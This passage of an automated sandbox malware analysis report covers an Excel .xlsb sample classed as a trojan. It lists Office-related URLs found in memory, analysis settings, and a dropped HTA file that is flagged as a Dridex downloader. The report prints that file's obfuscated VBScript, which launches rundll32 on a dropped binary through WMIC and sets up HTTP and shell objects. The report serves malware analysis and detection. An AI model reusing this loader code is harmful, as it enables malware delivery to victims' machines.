                                                          https://www.odwebp.svc.msEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://api.powerbi.com/v1.0/myorg/groupsEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                            		high
                                                            https://web.microsoftstream.com/video/EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                              		high
                                                              https://api.addins.store.officeppe.com/addinstemplateEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://graph.windows.netEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                		high
                                                                https://substrate.office.comUmEXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://api.onedrive.comMBIEXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                    		high
                                                                    https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseqbEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://ncus.contentsync.EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://outlook.office365.com/autodiscover/autodiscover.jsonBEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                          		high
                                                                          http://weather.service.msn.com/data.aspxEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                            		high
                                                                            https://api.aadrm.com/Kq#EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://substrate.office.comPEXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                              		high
                                                                              https://clients.config.office.net/user/v1.0/android/policiestf&EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                  		high
                                                                                  https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2AzurEXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://devnull.onenote.comMBI_SSL_SHORTEXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		low
                                                                                    https://api.microsoftstream.com/api/StreamVideoBasehttps://web.microsoftstream.com/video/PPTQuickStaEXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://wus2.contentsync.EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://login.windows.net/common/oauth2/authorizedEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://clients.config.office.net/user/v1.0/iosAACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                          		high
                                                                                          https://login.windows.net/common/oauth2/authorizefEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://login.windows.net/common/oauth2/authorizeXEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://portal.office.com/account/?ref=ClientMeControl9EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://dataservice.o365filtering.comvdEXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://o365auditrealtimeingestion.manage.office.comEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                                  		high
                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearerEXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://outlook.office365.com/api/v1.0/me/ActivitiesEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                                      		high
                                                                                                      https://clients.config.office.net/user/v1.0/macoEXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonAEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://clients.config.office.net/user/v1.0/android/policiesAACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                                            		high
                                                                                                            https://graph.windows.net/https://graph.windows.netEXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://login.windows.net/common/oauth2/authorizeREXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://clients.config.office.net/user/v1.0/android/policieshttps://login.windows.net/common/oauth2/EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://login.windows.net/common/oauth2/authorizeTEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oauEXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://entitlement.diagnostics.office.comEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                                                        		high
                                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                                                          		high
                                                                                                                          https://login.windows.net/common/oauth2/authorizeIEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office.com/EXCEL.EXE, 00000000.00000003.742802680.000000000E1B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661707076.000000000E1B3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656483060.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935840425.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934569051.000000000E1C3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742471357.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.773711564.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660226396.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778360459.000000000E1B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852707651.000000000E1C3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652977431.000000000E137000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654190436.000000000E19D000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                                                              		high
                                                                                                                              https://login.windows.net/common/oauth2/authorizeKEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workREXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechBearerEXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://storage.live.com/clientlogs/uploadlocationEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://login.windows.net/common/oauth2/authorizeNEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://substrate.office.com/search/api/v1/SearchHistoryEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://login.windows.net/common/oauth2/authorizeFEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://login.windows.net/common/oauth2/authorize8EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://login.windows.net/common/oauth2/authorize:EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://login.windows.net/common/oauth2/authorize=EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml=3EXCEL.EXE, 00000000.00000003.652989909.000000000F73B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935840425.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742471357.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.773711564.000000000F729000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://login.windows.net/common/oauth2/authorize?EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://login.windows.net/common/oauth2/authorize0EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://management.azure.com/BingGeospatialEndpointServiceUrlhttps://dev.virtualearth.net/REST/V1/GeEXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechPeAEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://login.windows.net/common/oauth2/authorize1EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high

                                                                                                                                                              Contacted IPs

                                                                                                                                                              No contacted IP infos

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                              Analysis ID:532553
                                                                                                                                                              Start date:02.12.2021
                                                                                                                                                              Start time:12:56:11
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 5m 58s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Sample file name:4310352755503838173672.xlsb
                                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                              Run name:Potential for more IOCs and behavior
                                                                                                                                                              Number of analysed new started processes analysed:18
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • HDC enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal96.troj.expl.evad.winXLSB@5/5@0/0
                                                                                                                                                              EGA Information:Failed
                                                                                                                                                              HDC Information:Failed
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                              • Number of non-executed functions: 2
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Adjust boot time
                                                                                                                                                              • Enable AMSI
                                                                                                                                                              • Found application associated with file extension: .xlsb
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Active AutoShape Object
                                                                                                                                                              • Active Picture Object
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer
                                                                                                                                                              Warnings:
                                                                                                                                                              Show All
                                                                                                                                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 92.122.145.220, 52.109.76.68, 52.109.8.24, 52.109.8.25
                                                                                                                                                              • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                              • Execution Graph export aborted for target EXCEL.EXE, PID 6980 because there are no executed function
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              12:57:59API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                              12:58:00API Interceptor1x Sleep call for process: mshta.exe modified

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              No context

                                                                                                                                                              Domains

                                                                                                                                                              No context

                                                                                                                                                              ASN

                                                                                                                                                              No context

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              No context

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\ProgramData\lvDMlIDBF.rtf
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4814
                                                                                                                                                              Entropy (8bit):5.043960662622874
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:FOBD0klec+c4mT3TcIr+BnSR5DHbDiyYnGdCmoY3ymoCJ8:OxB45VU5vDijna2myay
                                                                                                                                                              MD5:F36D5F88F66FB329BE532A92C60C4723
                                                                                                                                                              SHA1:F61F29BF96EA340E7C09D40E9D1A8A0B068A42DE
                                                                                                                                                              SHA-256:B2A8E8D7B6C0B5DE835F54959A9291344D1DB2EA0C68988E482680B00E0A029E
                                                                                                                                                              SHA-512:EBA2A80C6C8EF73A22F97B02021610AA74D1E66D5C41D76880E83CC863DE5C1A0E7B9ABE67331119747E7DA8485705942CE03AE5B80BBBBBAEA36424874A91FF
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\lvDMlIDBF.rtf, Author: Joe Security
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..z_B_S_N_O_c_a = "wm" & Chr(105) & "" & "c p" & "ro" & "ces" & "s " & "cal" & Chr(108) & " c" & "re" & "" & "ate" & Chr(32) & Chr(34) & "run" & Chr(100) & "" & "ll3" & Chr(50) & ".ex" & "e C" & Chr(58) & "" & "\\P" & "ro" & "gra" & "mD" & "" & "ata" & "\s" & "" & Chr(110) & "" & "igg" & "" & "" & "er" & "" & Chr(46) & "bin" & " G" & Chr(101) & "tNT" & "Ver" & "sio" & Chr(110) & "" & Chr(34) & ""..Set a_E_o_X_s_L_v_k_D_M_W_J = CreateObject(Chr(77+1-1) & "SX" & Chr(77+1-1) & "" & Chr(76+1-1) & Chr(50+1-1) & Chr(46+1-1) & "Ser" & "ver" & "" & "XM" & Chr(76+1-1) & "HTT" & "P." & "" & "" & "" & Chr(54+1-1) & ".0")....y_i_V_z_t_Z_p_F_b_f_Z_D_y_S = "Ws" & "" & Chr(99+1-1) & "" & "" & "rip" & "" & "t.S" & Chr(104+1-1) & "" & Chr(101+1-1) & "ll" & ""
